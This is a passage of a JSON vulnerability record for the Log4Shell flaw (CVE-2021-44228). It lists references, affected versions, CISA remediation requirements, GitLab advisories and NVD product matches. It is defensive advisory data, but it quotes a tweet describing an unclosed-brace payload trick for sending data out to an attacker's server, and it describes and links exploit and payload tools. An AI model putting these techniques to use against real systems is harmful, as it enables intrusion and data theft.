"name": "https://www.blumira.com/cve-2021-44228-log4shell/",
"type": "EVIDENCE",
"url": "https://www.blumira.com/cve-2021-44228-log4shell/"
},
{
"name": "https://news.ycombinator.com/item?id=29542896",
"type": "EVIDENCE",
"url": "https://news.ycombinator.com/item?id=29542896"
},
{
"content": "Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target",
"name": "https://twitter.com/TomAnthonySEO/status/1470374984749133825",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": "https://twitter.com/TomAnthonySEO/status/1470374984749133825"
},
{
"content": "A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x \"JNDI LDAP\" vulnerability.\n\nIt does three things:\n\n* Disables the internal method handler for jndi: format strings (\"lookups\").\n* Logs a message to System.err (i.e stderr) indicating that a log4j JNDI attempt has been made (including the format string attempted, with any ${} characters sanitized to prevent transitive injections).\n* Resolves the format string to \"(log4j jndi disabled)\" in the log message (to prevent transitive injections).",
"name": "log4j-jndi-be-gone",
"type": "FIX",
"url": "https://github.com/nccgroup/log4j-jndi-be-gone"
},
{
"name": "Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/"
},
{
"content": "A fast firewall reverse proxy with TLS (HTTPS) and swarm support for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.",
"name": "log4jail",
"type": "EVIDENCE",
"url": "https://github.com/mufeedvh/log4jail"
},
{
"name": "https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/",
"type": "EVIDENCE",
"url": "https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/"
},
{
"name": "https://github.com/jfrog/log4j-tools",
"type": "EVIDENCE",
"url": "https://github.com/jfrog/log4j-tools"
},
{
"name": "https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/",
"type": "EVIDENCE",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/"
},
{
"name": "https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/"
},
{
"name": "https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/"
},
{
"content": "Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent",
"name": "https://github.com/cyberstruggle/L4sh",
"type": "EVIDENCE",
"url": "https://github.com/cyberstruggle/L4sh"
},
{
"name": "https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/",
"type": "EVIDENCE",
"url": "https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/"
},
{
"name": "https://www.wired.com/story/log4j-log4shell/",
"type": "WEB",
"url": "https://www.wired.com/story/log4j-log4shell/"
},
{
"name": "https://www.theregister.com/2021/12/13/log4j_rce_latest/",
"type": "WEB",
"url": "https://www.theregister.com/2021/12/13/log4j_rce_latest/"
},
{
"content": "This is a dirty hack spring boot hello world proejct to test your tooling/payloads/detection capabilities locally before you hit production targets with them.\n\nThe configured Log4j version is 2.13.0",
"name": "https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service",
"type": "EVIDENCE",
"url": "https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service"
},
{
"name": "https://chasersystems.com/discrimiNAT/blog/log4shell-and-its-traces-in-a-network-egress-filter/",
"type": "EVIDENCE",
"url": "https://chasersystems.com/discrimiNAT/blog/log4shell-and-its-traces-in-a-network-egress-filter/"
},
{
"name": "https://www.theregister.com/2021/12/15/log4j_latest_cisa/",
"type": "WEB",
"url": "https://www.theregister.com/2021/12/15/log4j_latest_cisa/"
},
{
"content": "This tool provides you with the ability to scan internal (only) subnets for vulnerable log4j web services. It will attempt to send a JNDI payload to each discovered web service (via the methods outlined below) to a list of common HTTP/S ports. For every response it receives, it will log the responding host IP so we can get a list of the vulnerable servers.\n\nIf there is a \"SUCCESS\", this means that some web service has received the request, was vulnerable to the log4j exploit and sent a request to our TCP server.\n\nThe tool does not send any exploits to the vulnerable hosts, and is designed to be as passive as possible.",
"name": "log4jScanner",
"type": "EVIDENCE",
"url": "https://github.com/proferosec/log4jScanner"
},
{
"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache"
},
{
"name": "https://www.cisa.gov/emergency-directive-22-02",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/emergency-directive-22-02"
},
{
"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilities",
"type": "ARTICLE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilities"
},
{
"name": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/",
"type": "ARTICLE",
"url": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/"
},
{
"name": "https://therecord.media/google-more-than-35000-java-packages-impacted-by-log4j-vulnerabilities/",
"type": "ARTICLE",
"url": "https://therecord.media/google-more-than-35000-java-packages-impacted-by-log4j-vulnerabilities/"
},
{
"name": "https://twitter.com/erratarob/status/1475247078066450432",
"type": "EVIDENCE",
"url": "https://twitter.com/erratarob/status/1475247078066450432"
},
{
"name": "https://www.msn.com/en-xl/news/other/apache-log4j-bug-china-e2-80-99s-industry-ministry-pulls-support-from-alibaba-cloud-for-not-reporting-flaw-to-government-first/ar-AAS2Rht",
"type": "ARTICLE",
"url": "https://www.msn.com/en-xl/news/other/apache-log4j-bug-china-e2-80-99s-industry-ministry-pulls-support-from-alibaba-cloud-for-not-reporting-flaw-to-government-first/ar-AAS2Rht"
},
{
"name": "https://twitter.com/beauwoods/status/1479118516829622275?s=11",
"type": "EVIDENCE",
"url": "https://twitter.com/beauwoods/status/1479118516829622275?s=11"
},
{
"name": "https://4jfinder.github.io/",
"type": "EVIDENCE",
"url": "https://4jfinder.github.io/"
},
{
"name": "Neutralizing Your Inputs: A Log4Shell Weakness Story",
"type": "ARTICLE",
"url": "https://medium.com/@CWE_CAPEC/neutralizing-your-inputs-a-log4shell-weakness-story-89954c8b25c9"
},
{
"name": "Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz",
"type": "ARTICLE",
"url": "https://www.theregister.com/2022/01/11/outdated_log4j_downloads/"
},
{
"name": "Sonatype Log4j Download Dashboard",
"type": "ARTICLE",
"url": "https://www.sonatype.com/resources/log4j-vulnerability-resource-center"
}
],
"reporter": "kurtseifried",
"reporter_id": 582211,
"vendor_name": "Apache",
"vulnerability_type": [
"CWE-502 Deserialization of Untrusted Data",
"CWE-400 Uncontrolled Resource Consumption",
"CWE-20 Improper Input Validation"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2021-44228"
],
"details": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.",
"id": "GSD-2021-44228",
"modified": "2023-12-13T01:23:20.725867Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cisa.gov": {
"cveID": "CVE-2021-44228",
"dateAdded": "2021-12-10",
"dueDate": "2021-12-24",
"product": "Log4j2",
"requiredAction": "For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.",
"shortDescription": "Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.",
"vendorProject": "Apache",
"vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability"
},
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-44228",
"STATE": "PUBLIC",
"TITLE": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Log4j2",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_name": "log4j-core",
"version_value": "2.0-beta9"
},
{
"version_affected": "\u003c",
"version_name": "log4j-core",
"version_value": "2.3.1"
},
{
"version_affected": "\u003e=",
"version_name": "log4j-core",
"version_value": "2.4"
},
{
"version_affected": "\u003c",
"version_name": "log4j-core",
"version_value": "2.12.2"
},
{
"version_affected": "\u003e=",
"version_name": "log4j-core",
"version_value": "2.13.0"
},
{
"version_affected": "\u003c",
"version_name": "log4j-core",
"version_value": "2.15.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "critical"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-502 Deserialization of Untrusted Data"
}
]
},
{
"description": [
{
"lang": "eng",
"value": "CWE-400 Uncontrolled Resource Consumption"
}
]
},
{
"description": [
{
"lang": "eng",
"value": "CWE-20 Improper Input Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://logging.apache.org/log4j/2.x/security.html",
"refsource": "MISC",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"name": "https://security.netapp.com/advisory/ntap-20211210-0007/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "https://security.netapp.com/advisory/ntap-20211210-0007/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032",
"refsource": "CONFIRM",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032",
"refsource": "CONFIRM",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html",
"refsource": "CONFIRM",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "DSA-5020",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"name": "FEDORA-2021-f0f501d01f",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2",
"refsource": "MS",
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"name": "20211210 A Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "VU#930724",
"refsource": "CERT-VN",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"name": "https://twitter.com/kurtseifried/status/1469345530182455296",
"refsource": "MISC",
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"name": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html",
"refsource": "CONFIRM",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"name": "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"name": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"name": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"name": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"name": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"name": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"name": "FEDORA-2021-66d6c484f3",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"name": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"name": "https://www.oracle.com/security-alerts/cpujan2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"name": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"name": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md",
"refsource": "MISC",
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"name": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"name": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001",
"refsource": "MISC",
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"name": "https://github.com/cisagov/log4j-affected-db",
"refsource": "MISC",
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"name": "https://support.apple.com/kb/HT213189",
"refsource": "CONFIRM",
"url": "https://support.apple.com/kb/HT213189"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228",
"refsource": "MISC",
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"name": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html",
"refsource": "MISC",
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"name": "20220721 Open-Xchange Security Advisory 2022-07-21",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"name": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"name": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"name": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "(,0)",
"affected_versions": "None",
"cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-502",
"CWE-937"
],
"date": "2021-12-13",
"description": "This advisory has been marked as a false positive.",
"fixed_versions": [],
"identifier": "CVE-2021-44228",
"identifiers": [
"CVE-2021-44228",
"GHSA-jfh8-c2jp-5v3q"
],
"not_impacted": "",
"package_slug": "maven/org.apache.logging.log4j/log4j-api",
"pubdate": "2021-12-10",
"solution": "Nothing to be done.",
"title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
"urls": [
"https://www.lunasec.io/docs/blog/log4j-zero-day/",
"https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
],
"uuid": "1f39f0d1-1df2-4f3e-b68c-41fa5952b444"
},
{
"affected_range": "[2.0,2.3.1],[2.4.0,2.12.2),[2.13.0,2.15.0)",
"affected_versions": "All versions starting from 2.0 up to 2.3.1, all versions starting from 2.4.0 before 2.12.2, all versions starting from 2.13.0 before 2.15.0",
"cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-20",
"CWE-937"
],
"date": "2023-04-03",
"description": "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j, this behavior has been disabled by default. In previous releases (\u003e2.10) this behavior can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true` or it can be mitigated in prior releases (\u003c2.10) by removing the JndiLookup class from the classpath (example, `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).",
"fixed_versions": [
"2.3.2",
"2.12.2",
"2.15.0"
],
"identifier": "CVE-2021-44228",
"identifiers": [
"CVE-2021-44228",
"GHSA-jfh8-c2jp-5v3q"
],
"not_impacted": "All versions before 2.0, all versions after 2.3.1 before 2.4.0, all versions starting from 2.12.2 before 2.13.0, all versions starting from 2.15.0",
"package_slug": "maven/org.apache.logging.log4j/log4j-core",
"pubdate": "2021-12-10",
"solution": "Upgrade to versions 2.3.2, 2.12.2, 2.15.0 or above.",
"title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
"urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"https://www.lunasec.io/docs/blog/log4j-zero-day/",
"https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
],
"uuid": "a1a68216-be96-42ea-a47c-5e4fc4f8318c"
},
{
"affected_range": "[2.0,2.3.1],[2.4.0,2.12.2),[2.13.0,2.15.0)",
"affected_versions": "All versions starting from 2.0 up to 2.3.1, all versions starting from 2.4.0 before 2.12.2, all versions starting from 2.13.0 before 2.15.0",
"cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-20",
"CWE-937"
],
"date": "2023-04-03",
"description": "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j, this behavior has been disabled by default. In previous releases (\u003e2.10) this behavior can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true` or it can be mitigated in prior releases (\u003c2.10) by removing the JndiLookup class from the classpath (example, `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).",
"fixed_versions": [
"2.3.2",
"2.12.2",
"2.15.0"
],
"identifier": "CVE-2021-44228",
"identifiers": [
"CVE-2021-44228",
"GHSA-jfh8-c2jp-5v3q"
],
"not_impacted": "All versions before 2.0, all versions after 2.3.1 before 2.4.0, all versions starting from 2.12.2 before 2.13.0, all versions starting from 2.15.0",
"package_slug": "maven/org.apache.logging.log4j/log4j",
"pubdate": "2021-12-10",
"solution": "Upgrade to versions 2.3.2, 2.12.2, 2.15.0 or above.",
"title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
"urls": [
"https://www.lunasec.io/docs/blog/log4j-zero-day/",
"https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
],
"uuid": "4e9a17d3-27b2-49e3-b977-f017a4855aa7"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.15.0",
"versionStartIncluding": "2.13.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.3.1",
"versionStartIncluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.12.2",
"versionStartIncluding": "2.4.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:sppa-t3000_ses3000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:siemens:logo\\!_soft_comfort:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.70",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
